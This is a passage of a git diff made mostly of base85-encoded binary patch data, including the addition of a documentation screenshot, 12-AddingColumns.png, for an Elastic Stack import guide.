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

diff --git a/doc/ElasticStackImport/12-AddingColumns.png b/doc/ElasticStackImport/12-AddingColumns.png
new file mode 100644
index 0000000000000000000000000000000000000000..69d7b25f613ba7cbfb97ef59e7a4b5b4c1bda85c
GIT binary patch
literal 125224
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
